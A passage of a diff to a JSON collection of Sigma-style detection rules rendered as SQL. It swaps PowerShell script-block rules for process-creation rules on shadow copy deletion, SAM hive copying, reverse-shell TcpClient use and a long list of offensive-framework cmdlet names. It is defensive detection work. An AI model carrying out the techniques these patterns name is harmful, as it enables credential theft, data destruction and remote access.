"proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR 